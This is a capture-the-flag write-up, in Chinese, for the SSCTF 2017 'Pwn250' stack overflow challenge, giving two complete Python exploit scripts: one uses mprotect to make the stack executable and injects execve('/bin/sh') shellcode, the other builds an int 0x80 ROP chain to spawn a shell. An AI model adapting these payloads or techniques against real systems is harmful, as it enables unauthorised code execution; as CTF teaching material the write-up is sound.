2017- SSCTF-Pwn250

Writeup
,
漏洞很简单,栈溢出,如下:

方法一: mprotect 传shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/env python2
# -*- coding:utf-8 -*-
from pwn import *

# switches

if len(sys.argv) == 1:
	DEBUG = 1 
else :
	DEBUG = 0
# modify this
if DEBUG:
    io = process('./250')
	#gdb.attach(io,'#b main')
else:
    io = remote(sys.argv[1], int(sys.argv[2]))

context(log_level='debug')

# define symbols and offsets here

mprotect = 0x0806E070
main_addr = 0x08048886
read = 0x0806D510
stack = 0x08049000
size = 0x1000
prop = 7

# define exploit function here
def pwn():
	io.recvuntil('[InPut Data Size]')
	io.sendline('82')
	io.recvuntil('[YourData]')
	payload1 = 'A' * 62+p32(mprotect)+p32(main_addr)+p32(stack)+p32(size)+p32(prop)	
	io.send(payload1)
	io.recvuntil('[InPut Data Size]')
	io.sendline('90')
	io.recvuntil('[YourData]')
	shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
	ssize = len(shellcode)
	payload2 = 'A' * 62+p32(read)+p32(stack)+p32(0)+p32(stack)+p32(ssize)+'THE END!'
	io.send(payload2)
	#io.recvuntil('THE END!')
	raw_input('send?')
	io.send(shellcode)
	io.interactive()
	return

if __name__ == '__main__':
    pwn()

方法二:

int 80 起shell by pxx

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
	
from pwn import*
import time
def pwn(io):
    io.read_until("]")
	dl_mk_stack_exe = 0x080A0AF0

	context(arch = 'i386', os = 'linux')
	shellcode = asm(shellcraft.i386.sh())

	#0x080e77dc : add ebx, esp ; add dword ptr [edx], ecx ; ret
	add_ebx_esp = 0x080e77dc
	#0x080481c9 : pop ebx ; ret
	p_ebx_ret = 0x080481c9
	#0x0804f2ea : mov eax, ebx ; pop ebx ; ret
	mov_eax_ebx_p_ret = 0x0804f2ea

	#0x0806cbb5 : int 0x80
	p_eax_ret = 0x080b89e6
	p_ebx_ret = 0x080481c9
	p_ecx_ret = 0x080df1b9
	p_edx_ret = 0x0806efbb
	int80_addr = 0x0806cbb5

	read_addr = 0x0806D510
	bss_addr = 0x080ece00

	payload = ""
	payload += "a"*0x3a
	payload += l32(0)
	payload += gen_rop_data(read_addr, [0, bss_addr, 8])
	payload += l32(p_eax_ret)
	payload += l32(0xb)
	payload += l32(p_ebx_ret)
	payload += l32(bss_addr)
	payload += l32(p_ecx_ret)
	payload += l32(0)
	payload += l32(p_edx_ret)
	payload += l32(0)
	payload += l32(int80_addr)

	io.writeline(str(1000))
	io.read_until("]")

	io.gdb_hint()
	io.writeline(payload)
	io.read_until("]")	

	time.sleep(1)
	io.writeline("/bin/sh\x00")
	io.interact()

	io.interact()